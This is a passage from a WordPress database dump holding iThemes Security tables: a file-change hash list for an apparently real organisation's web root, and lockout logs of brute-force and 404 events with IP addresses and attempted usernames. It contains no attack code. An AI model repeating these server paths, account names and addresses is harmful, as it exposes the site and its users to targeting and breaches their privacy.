ary\\/DSC00214.JPG\":{\"d\":1270243186,\"h\":\"a7642814fad4570c7b7233f9807b53e9\"},\"\\/home2\\/zphiblgz\\/public_html\\/images\\/phocagallery\\/LGZ_25th_Anniversary\\/DSC00221.JPG\":{\"d\":1270243218,\"h\":\"4597c38b03573d4756bb31ddce2aa57b\"},\"\\/home2\\/zphiblgz\\/public_html\\/images\\/phocagallery\\/LGZ_25th_Anniversary\\/DSC00223.JPG\":{\"d\":1270243190,\"h\":\"e1b7f6b7e73c2f39343b4d37edf64207\"},\"\\/home2\\/zphiblgz\\/public_html\\/images\\/phocagallery\\/index.html\":{\"d\":1269632123,\"h\":\"dd5d02cc750d2855cf6f6c5bf5bea587\"},\"\\/home2\\/zphiblgz\\/public_html\\/images\\/M_images\\/index.html\":{\"d\":1257356685,\"h\":\"dd5d02cc750d2855cf6f6c5bf5bea587\"},\"\\/home2\\/zphiblgz\\/public_html\\/images\\/index.html\":{\"d\":1257356685,\"h\":\"1c7b413c3fa39d0fed40556d2658ac73\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/combobox.js\":{\"d\":1272357037,\"h\":\"63490752746e9d93980f5efef748cfe6\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/index.html\":{\"d\":1257356719,\"h\":\"1c7b413c3fa39d0fed40556d2658ac73\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/tabs.js\":{\"d\":1272357037,\"h\":\"c891da3135c3ac3152983a0d3e72165a\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/calendar-setup.js\":{\"d\":1257356719,\"h\":\"1bd1051973ea17f452fd8fe966940452\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/mootree_packed.js\":{\"d\":1257356719,\"h\":\"23f393446a668d713c0bd7261640bc1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/caption.js\":{\"d\":1272357037,\"h\":\"38ba23053bea8a521cd624b6ad88e475\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/uploader.js\":{\"d\":1257356719,\"h\":\"aec20e7529b72bad3d592c956d174b9e\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/validate.js\":{\"d\":1272357037,\"h\":\"bd3b26ce13d2194b26df3f95b9b0b2bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/mootools.js\":{\"d\":1257356719,\"h\":\"f6490edc31bf9c25ba507f41ce614def\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/mootree.js\":{\"d\":1257356719,\"h\":\"fd3ff909128dad9fe904d85cecc8e529\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/swf.js\":{\"d\":1257356719,\"h\":\"b5e752a08f738a3501589c0117cfea41\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/mootools-uncompressed.js\":{\"d\":1257356719,\"h\":\"0fcafc954408e50aad1ba791d2a074f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/switcher.js\":{\"d\":1272357037,\"h\":\"68479dee1a8d1b9657db0876295293fe\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/calendar.js\":{\"d\":1257356719,\"h\":\"4be3246dfc1ab2c452403852832f9f84\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/openid.js\":{\"d\":1272357037,\"h\":\"b6dd3f2755a06fee9ace4fd39e742644\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/js\\/modal.js\":{\"d\":1279289128,\"h\":\"d006966c1ff93b68eb02451008de1879\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/swf\\/uploader.swf\":{\"d\":1257356718,\"h\":\"938d193812676f2e5e21c1e029678efb\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/images\\/index.html\":{\"d\":1257356719,\"h\":\"1c7b413c3fa39d0fed40556d2658ac73\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/css\\/index.html\":{\"d\":1257356718,\"h\":\"1c7b413c3fa39d0fed40556d2658ac73\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/css\\/calendar-jos.css\":{\"d\":1257356718,\"h\":\"fdc1b2fe6ff00acd638c9ceed8a46937\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/css\\/mootree.css\":{\"d\":1257356718,\"h\":\"46147971a08f16a5cd3f2fd7f2b3057b\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/css\\/modal.css\":{\"d\":1257356718,\"h\":\"88606c24f61ec0611b866f7d8e110b5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/system\\/index.html\":{\"d\":1257356718,\"h\":\"1c7b413c3fa39d0fed40556d2658ac73\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/documents\\/index.html\":{\"d\":1270235562,\"h\":\"dd5d02cc750d2855cf6f6c5bf5bea587\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/simplecalendar\\/id7-PersonalInformationDoc.pdf\":{\"d\":1280961266,\"h\":\"40d6998b1637a6a55daecb5c046552b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/simplecalendar\\/id7-Cruise2Flyer2011.pdf\":{\"d\":1280961278,\"h\":\"22dbac92f99f7e9794223ea471581b76\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/simplecalendar\\/id35-zpb-lgz skate party flyer.doc\":{\"d\":1364519946,\"h\":\"9a5b9430e3a90d5e7b623b1857366789\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/simplecalendar\\/id30-Wine Tastin1.pdf\":{\"d\":1329309447,\"h\":\"eb909917824cac8f3ee17a30cf9266ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/simplecalendar\\/id30-LGZ Winery Flier.pdf\":{\"d\":1330036466,\"h\":\"91f8d356e86ebbd60e7dd456ab57de8c\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/index.html\":{\"d\":1257356718,\"h\":\"1c7b413c3fa39d0fed40556d2658ac73\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/application 09-10.doc\":{\"d\":1270235595,\"h\":\"92da980d8f2afaa4cd5a4ffa67b81625\"},\"\\/home2\\/zphiblgz\\/public_html\\/media\\/application criteria 09-10.doc\":{\"d\":1270235605,\"h\":\"230734128976b7a5d930ad89aab12983\"},\"\\/home2\\/zphiblgz\\/public_html\\/dump.sql\":{\"d\":1514065525,\"h\":\"d5da86d8bad33ffebe313e70b47c89d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/xmlrpc.php\":{\"d\":1508736206,\"h\":\"6c53e2ff076280c5cfc410a3c632c785\"},\"\\/home2\\/zphiblgz\\/public_html\\/hard_20171226_081515.zip\":{\"d\":1514301327,\"h\":\"e61f1e078e767e9d59b22582298207c3\"},\"\\/home2\\/zphiblgz\\/public_html\\/ninja-forms-1.csv\":{\"d\":1538538364,\"h\":\"7754be76368103f2c8181532f6b672c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/zphiblgz.org_1543068686274.php\":{\"d\":1543068712,\"h\":\"69fbaadd4db4541914d150856adc20a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/.ips1.txt\":{\"d\":1514323526,\"h\":\"8afab5619619b04a66785f4b25e54dda\"},\"\\/home2\\/zphiblgz\\/public_html\\/logs.txt\":{\"d\":1514317211,\"h\":\"dd092d3867924a56e890fb6e12e3a654\"},\"\\/home2\\/zphiblgz\\/public_html\\/.htaccess.cache.1557860531\":{\"d\":1557860531,\"h\":\"075f7fe3518ba6d76d43c72928ab2cc1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-comments-post.php\":{\"d\":1526741175,\"h\":\"35bad2f931d0169557f53d0090d6f942\"},\"\\/home2\\/zphiblgz\\/public_html\\/error_log\":{\"d\":1568882410,\"h\":\"802ba39b214443bb8be44e150c0d01e0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-cron.php\":{\"d\":1515453954,\"h\":\"d757d0ea6ee22b647e6acbdebf00683f\"},\"\\/home2\\/zphiblgz\\/public_html\\/.htaccess.ea4new\":{\"d\":1556754051,\"h\":\"075f7fe3518ba6d76d43c72928ab2cc1\"},\"\\/home2\\/zphiblgz\\/public_html\\/footer.php\":{\"d\":1521692822,\"h\":\"498b1481d8a4acf1a479e1970be80670\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-config-sample.php\":{\"d\":1452146830,\"h\":\"d1490486fc3f4965a6200256a7fe11b9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp_blank.sql\":{\"d\":1380812475,\"h\":\"389bd063efe5fadcd20ff24123a6b76f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-settings.php\":{\"d\":1515453952,\"h\":\"9513d45496670e1ecfa45d9fdea73880\"},\"\\/home2\\/zphiblgz\\/public_html\\/.htaccess.ea4bak\":{\"d\":1556086570,\"h\":\"88241333256f2aecb7b0b6b0bfc74ffe\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-blog-header.php\":{\"d\":1515348922,\"h\":\"edad74614d6d3fa2252c3d74ff037ac7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-login.php\":{\"d\":1544670952,\"h\":\"d393dcdeed1752815226ac182acca87a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-mail.php\":{\"d\":1484164960,\"h\":\"8d6c9e4dab7697a044a22a96cd787068\"},\"\\/home2\\/zphiblgz\\/public_html\\/license.txt\":{\"d\":1516143871,\"h\":\"9348da52c104f75fe1befc73609020cf\"},\"\\/home2\\/zphiblgz\\/public_html\\/.htaccess.cache.1560884605\":{\"d\":1560884605,\"h\":\"075f7fe3518ba6d76d43c72928ab2cc1\"},\"\\/home2\\/zphiblgz\\/public_html\\/.htaccess.cache.1548432546\":{\"d\":1548432546,\"h\":\"bc7d5aa17d2c8a9a57220d1f351ab42f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-load.php\":{\"d\":1515453955,\"h\":\"8edbcbcc51de98432f95aee15a561263\"},\"\\/home2\\/zphiblgz\\/public_html\\/index.php\":{\"d\":1495891202,\"h\":\"b61b25303be0f573a6b9446d5cbe3a5b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-config.php\":{\"d\":1548432495,\"h\":\"1ff7e833ec7b6cadc719886b7fc1d7a9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-trackback.php\":{\"d\":1515453955,\"h\":\"1b1908c12e1b3089f6cce5bf8dc7eca0\"},\"\\/home2\\/zphiblgz\\/public_html\\/.ftpquota\":{\"d\":1568356504,\"h\":\"69c78983068fb65a8c4b81256fa30078\"},\"\\/home2\\/zphiblgz\\/public_html\\/readme.html\":{\"d\":1567657984,\"h\":\"55d27f1f9f7f79fa2593a5b32907ee44\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-links-opml.php\":{\"d\":1483983252,\"h\":\"55f5eeda4f64271322d249c14685c162\"},\"\\/home2\\/zphiblgz\\/public_html\\/.htaccess\":{\"d\":1568788338,\"h\":\"bbcf1c88834b1f5788d5a34cd330d5d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-cli.yml\":{\"d\":1514328017,\"h\":\"558a5ddd0198a4ce87dc7e2f408b99ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-activate.php\":{\"d\":1544670952,\"h\":\"5390edef68ed88f21f7f9e33717d7149\"},\"\\/home2\\/zphiblgz\\/public_html\\/ninja-forms-0.csv\":{\"d\":1538538364,\"h\":\"7754be76368103f2c8181532f6b672c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-signup.php\":{\"d\":1526741175,\"h\":\"1b902775bb00c7996bbe7a0fc8dfd8d9\"}}','2019-09-19 08:59:24');
/*!40000 ALTER TABLE `lwz_itsec_distributed_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_fingerprints`
--

DROP TABLE IF EXISTS `lwz_itsec_fingerprints`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_fingerprints` (
  `fingerprint_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `fingerprint_user` bigint(20) unsigned NOT NULL,
  `fingerprint_hash` char(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `fingerprint_created_at` datetime NOT NULL,
  `fingerprint_approved_at` datetime NOT NULL,
  `fingerprint_data` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `fingerprint_snapshot` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `fingerprint_last_seen` datetime NOT NULL,
  `fingerprint_uses` int(11) NOT NULL DEFAULT '0',
  `fingerprint_status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `fingerprint_uuid` char(36) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`fingerprint_id`),
  UNIQUE KEY `fingerprint_user__hash` (`fingerprint_user`,`fingerprint_hash`),
  UNIQUE KEY `fingerprint_uuid` (`fingerprint_uuid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_fingerprints`
--

LOCK TABLES `lwz_itsec_fingerprints` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_fingerprints` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_itsec_fingerprints` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_geolocation_cache`
--

DROP TABLE IF EXISTS `lwz_itsec_geolocation_cache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_geolocation_cache` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `location_host` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `location_lat` decimal(10,8) NOT NULL,
  `location_long` decimal(11,8) NOT NULL,
  `location_label` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `location_credit` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `location_time` datetime NOT NULL,
  PRIMARY KEY (`location_id`),
  UNIQUE KEY `location_host` (`location_host`),
  KEY `location_time` (`location_time`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_geolocation_cache`
--

LOCK TABLES `lwz_itsec_geolocation_cache` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_geolocation_cache` DISABLE KEYS */;
/*!40000 ALTER TABLE `lwz_itsec_geolocation_cache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_itsec_lockouts`
--

DROP TABLE IF EXISTS `lwz_itsec_lockouts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_itsec_lockouts` (
  `lockout_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `lockout_type` varchar(25) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `lockout_start` datetime NOT NULL,
  `lockout_start_gmt` datetime NOT NULL,
  `lockout_expire` datetime NOT NULL,
  `lockout_expire_gmt` datetime NOT NULL,
  `lockout_host` varchar(40) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `lockout_user` bigint(20) unsigned DEFAULT NULL,
  `lockout_username` varchar(60) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `lockout_active` int(1) NOT NULL DEFAULT '1',
  `lockout_context` text COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`lockout_id`),
  KEY `lockout_expire_gmt` (`lockout_expire_gmt`),
  KEY `lockout_host` (`lockout_host`),
  KEY `lockout_user` (`lockout_user`),
  KEY `lockout_username` (`lockout_username`),
  KEY `lockout_active` (`lockout_active`)
) ENGINE=MyISAM AUTO_INCREMENT=164 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_itsec_lockouts`
--

LOCK TABLES `lwz_itsec_lockouts` WRITE;
/*!40000 ALTER TABLE `lwz_itsec_lockouts` DISABLE KEYS */;
INSERT INTO `lwz_itsec_lockouts` VALUES (50,'four_oh_four','2020-03-26 15:12:55','2020-03-26 20:12:55','2020-03-26 15:27:55','2020-03-26 20:27:55','82.165.203.254',NULL,NULL,1,NULL),(51,'four_oh_four','2020-04-01 05:52:49','2020-04-01 10:52:49','2020-04-01 06:07:49','2020-04-01 11:07:49','51.77.249.202',NULL,NULL,1,NULL),(52,'four_oh_four','2020-04-28 15:33:02','2020-04-28 20:33:02','2020-04-28 15:48:02','2020-04-28 20:48:02','209.54.43.202',NULL,NULL,1,NULL),(53,'four_oh_four','2020-04-29 23:51:09','2020-04-30 04:51:09','2020-04-30 00:06:09','2020-04-30 05:06:09','51.89.201.8',NULL,NULL,1,NULL),(54,'four_oh_four','2020-05-15 18:11:54','2020-05-15 23:11:54','2020-05-15 18:26:54','2020-05-15 23:26:54','47.113.87.53',NULL,NULL,1,NULL),(55,'four_oh_four','2020-05-15 22:00:02','2020-05-16 03:00:02','2020-05-15 22:15:02','2020-05-16 03:15:02','158.101.18.36',NULL,NULL,1,NULL),(56,'four_oh_four','2020-05-30 09:06:41','2020-05-30 14:06:41','2020-05-30 09:21:41','2020-05-30 14:21:41','23.101.178.172',NULL,NULL,1,NULL),(57,'four_oh_four','2020-06-08 21:05:31','2020-06-09 02:05:31','2020-06-08 21:20:31','2020-06-09 02:20:31','40.124.52.27',NULL,NULL,1,NULL),(58,'four_oh_four','2020-06-08 21:21:03','2020-06-09 02:21:03','2020-06-08 21:36:03','2020-06-09 02:36:03','40.124.52.27',NULL,NULL,1,NULL),(59,'four_oh_four','2020-06-10 07:04:20','2020-06-10 12:04:20','2020-06-10 07:19:20','2020-06-10 12:19:20','173.232.243.171',NULL,NULL,1,NULL),(60,'four_oh_four','2020-06-14 12:26:09','2020-06-14 17:26:09','2020-06-14 12:41:09','2020-06-14 17:41:09','35.193.194.224',NULL,NULL,1,NULL),(61,'four_oh_four','2020-06-14 15:07:49','2020-06-14 20:07:49','2020-06-14 15:22:49','2020-06-14 20:22:49','51.89.201.9',NULL,NULL,1,NULL),(62,'four_oh_four','2020-06-15 01:21:02','2020-06-15 06:21:02','2020-06-15 01:36:02','2020-06-15 06:36:02','168.61.52.210',NULL,NULL,1,NULL),(63,'four_oh_four','2020-06-15 19:26:58','2020-06-16 00:26:58','2020-06-15 19:41:58','2020-06-16 00:41:58','35.193.194.224',NULL,NULL,1,NULL),(64,'four_oh_four','2020-07-03 13:00:08','2020-07-03 18:00:08','2020-07-03 13:15:08','2020-07-03 18:15:08','34.70.141.51',NULL,NULL,1,NULL),(65,'four_oh_four','2020-07-06 21:06:17','2020-07-07 02:06:17','2020-07-06 21:21:17','2020-07-07 02:21:17','35.225.8.194',NULL,NULL,1,NULL),(66,'brute_force','2020-07-13 22:55:30','2020-07-14 03:55:30','2020-07-13 23:10:30','2020-07-14 04:10:30','141.138.45.14',NULL,NULL,1,NULL),(67,'brute_force','2020-07-13 23:30:02','2020-07-14 04:30:02','2020-07-13 23:45:02','2020-07-14 04:45:02','141.138.45.14',NULL,NULL,1,NULL),(68,'brute_force','2020-07-15 02:41:04','2020-07-15 07:41:04','2020-07-15 02:56:04','2020-07-15 07:56:04','141.138.41.205',NULL,NULL,1,NULL),(69,'brute_force','2020-07-16 01:14:14','2020-07-16 06:14:14','2020-07-16 01:29:14','2020-07-16 06:29:14','141.138.43.134',NULL,NULL,1,NULL),(70,'brute_force','2020-07-16 01:48:48','2020-07-16 06:48:48','2020-07-16 02:03:48','2020-07-16 07:03:48','141.138.43.134',NULL,NULL,1,NULL),(71,'brute_force','2020-07-18 02:20:52','2020-07-18 07:20:52','2020-07-18 02:35:52','2020-07-18 07:35:52','39.32.0.170',NULL,NULL,1,NULL),(72,'brute_force','2020-07-18 02:55:27','2020-07-18 07:55:27','2020-07-18 03:10:27','2020-07-18 08:10:27','154.160.14.204',NULL,NULL,1,NULL),(73,'brute_force','2020-07-18 03:19:56','2020-07-18 08:19:56','2020-07-18 03:34:56','2020-07-18 08:34:56','106.215.218.66',NULL,NULL,1,NULL),(74,'brute_force','2020-07-19 04:03:38','2020-07-19 09:03:38','2020-07-19 04:18:38','2020-07-19 09:18:38','154.160.14.204',NULL,NULL,1,NULL),(75,'brute_force','2020-07-23 07:57:21','2020-07-23 12:57:21','2020-07-23 08:12:21','2020-07-23 13:12:21','112.135.6.230',NULL,NULL,1,NULL),(76,'brute_force','2020-07-23 08:31:55','2020-07-23 13:31:55','2020-07-23 08:46:55','2020-07-23 13:46:55','112.135.6.230',NULL,NULL,1,NULL),(77,'four_oh_four','2020-07-28 06:47:17','2020-07-28 11:47:17','2020-07-28 07:02:17','2020-07-28 12:02:17','52.249.189.198',NULL,NULL,1,NULL),(78,'four_oh_four','2020-08-05 01:57:46','2020-08-05 06:57:46','2020-08-05 02:12:46','2020-08-05 07:12:46','52.249.189.198',NULL,NULL,1,NULL),(79,'four_oh_four','2020-08-05 12:45:48','2020-08-05 17:45:48','2020-08-05 13:00:48','2020-08-05 18:00:48','13.84.49.66',NULL,NULL,1,NULL),(80,'four_oh_four','2020-08-23 19:53:09','2020-08-24 00:53:09','2020-08-23 20:08:09','2020-08-24 01:08:09','118.31.120.31',NULL,NULL,1,NULL),(81,'brute_force','2020-08-26 00:05:12','2020-08-26 05:05:12','2020-08-26 00:20:12','2020-08-26 05:20:12','163.47.151.104',NULL,NULL,1,NULL),(82,'brute_force','2020-09-01 15:31:06','2020-09-01 20:31:06','2020-09-01 15:46:06','2020-09-01 20:46:06','128.90.63.242',NULL,NULL,1,NULL),(83,'four_oh_four','2020-09-05 06:39:25','2020-09-05 11:39:25','2020-09-05 06:54:25','2020-09-05 11:54:25','39.101.184.55',NULL,NULL,1,NULL),(84,'brute_force','2020-09-19 20:01:38','2020-09-20 01:01:38','2020-09-19 20:16:38','2020-09-20 01:16:38','178.137.165.159',NULL,NULL,1,NULL),(85,'brute_force','2020-09-20 12:30:16','2020-09-20 17:30:16','2020-09-20 12:45:16','2020-09-20 17:45:16','23.96.3.40',NULL,NULL,1,NULL),(86,'brute_force','2020-09-20 23:26:14','2020-09-21 04:26:14','2020-09-20 23:41:14','2020-09-21 04:41:14','3.85.216.35',NULL,NULL,1,NULL),(87,'four_oh_four','2020-09-22 12:48:38','2020-09-22 17:48:38','2020-09-22 13:03:38','2020-09-22 18:03:38','35.238.252.69',NULL,NULL,1,NULL),(88,'brute_force','2020-09-28 09:50:27','2020-09-28 14:50:27','2020-09-28 10:05:27','2020-09-28 15:05:27','40.121.50.196',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"40.121.50.196\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:5:\"admin\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(89,'brute_force','2020-10-01 13:39:11','2020-10-01 18:39:11','2020-10-01 13:54:11','2020-10-01 18:54:11','100.25.142.166',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"100.25.142.166\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:5:\"admin\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(90,'brute_force','2020-10-03 15:05:14','2020-10-03 20:05:14','2020-10-03 15:20:14','2020-10-03 20:20:14','18.191.217.195',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"18.191.217.195\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:5:\"admin\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(91,'brute_force','2020-10-07 09:50:04','2020-10-07 14:50:04','2020-10-07 10:05:04','2020-10-07 15:05:04','68.134.121.122',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"68.134.121.122\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:12:\"lindabrigmon\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(92,'brute_force','2020-10-07 12:06:54','2020-10-07 17:06:54','2020-10-07 12:21:54','2020-10-07 17:21:54','212.129.8.63',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:12:\"212.129.8.63\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:5:\"admin\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(93,'brute_force','2020-10-12 08:39:09','2020-10-12 13:39:09','2020-10-12 08:54:09','2020-10-12 13:54:09','183.83.208.183',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"183.83.208.183\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(94,'brute_force','2020-10-12 09:12:42','2020-10-12 14:12:42','2020-10-12 09:27:42','2020-10-12 14:27:42','183.83.208.183',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:14:\"183.83.208.183\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";s:8:\"zphiblgz\";s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:11:\"brute_force\";}'),(95,'four_oh_four','2020-10-15 05:22:26','2020-10-15 10:22:26','2020-10-15 05:37:26','2020-10-15 10:37:26','45.77.223.34',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:12:\"45.77.223.34\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(96,'four_oh_four','2020-10-25 08:54:52','2020-10-25 13:54:52','2020-10-25 09:09:52','2020-10-25 14:09:52','104.214.79.46',NULL,NULL,1,'O:40:\"iThemesSecurity\\Lib\\Lockout\\Host_Context\":5:{s:46:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0host\";s:13:\"104.214.79.46\";s:55:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_user_id\";N;s:56:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0login_username\";N;s:62:\"\0iThemesSecurity\\Lib\\Lockout\\Host_Context\0user_limit_triggered\";b:0;s:51:\"\0iThemesSecurity\\Lib\\Lockout\\Context\0lockout_module\";s:12:\"four_oh_four\";}'),(97,'four_oh_four','2020-10-30 10:54:03','2020-10-30 15:54:03','2020-10-30 